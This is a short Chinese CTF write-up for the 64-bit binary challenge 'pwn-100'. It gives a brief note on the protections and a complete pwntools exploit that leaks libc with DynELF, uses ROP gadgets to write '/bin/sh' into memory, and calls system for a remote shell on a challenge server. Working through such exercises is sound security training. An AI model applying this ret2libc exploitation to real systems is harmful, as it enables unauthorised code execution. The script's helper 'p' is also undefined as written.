pwn之pwn-100

1.题目

1.1.保护机制

没开canary和ASLR，只开了NX

1.2.关键代码

2.思路

d = DynELF(leak,elf=elf)
system_addr =  d.lookup('system','libc')

from pwn import *

#context(arch="amd",os="linux",log_level="debug")
con = remote('111.200.241.244',59165)
#con = process('./pwn')
elf = ELF('./pwn')
puts_addr = elf.plt['puts']
read_addr = elf.got['read']
start_addr = 0x400550
pop_rdi = 0x400763
gadget1 = 0x40075A
gadget2 = 0x400740
str_addr = 0x601040

def leak(addr):
    payload = "A"*72 + p(pop_rdi) + p(addr) + p(puts_addr) + p(start_addr)
    payload = payload.ljust(200,'B')
    con.send(payload)
    con.recvuntil("bye~\n")
    up = ''
    content = ''
    while True: 
        c = con.recv(numb=1, timeout=0.1)
        if up == '\n' and c == "":
            content = content[:-1]+'\x00'
            break
        else:
            content += c
            up = c
    content = content[:4]
    return content

d = DynELF(leak,elf=elf)
system_addr =  d.lookup('system','libc')

# call read 
payload = "A"*72
payload += p(gadget1)
payload += p(0)
payload += p(1)
payload += p(read_addr)
payload += p(8)
payload += p(str_addr)
payload += p(0)
payload += p(gadget2)
payload += "\x00"* 56  # add rsp,8
payload += p(start_addr)
payload = payload.ljust(200,'B')

# input str
con.send(payload)
con.recvuntil("bye~\n")
con.send('/bin/sh\x00')

# call system
payload = "A"*72
payload += p(pop_rdi) + p(str_addr) + p(system_addr)
payload =  payload.ljust(200,"B")
con.send(payload)

con.interactive()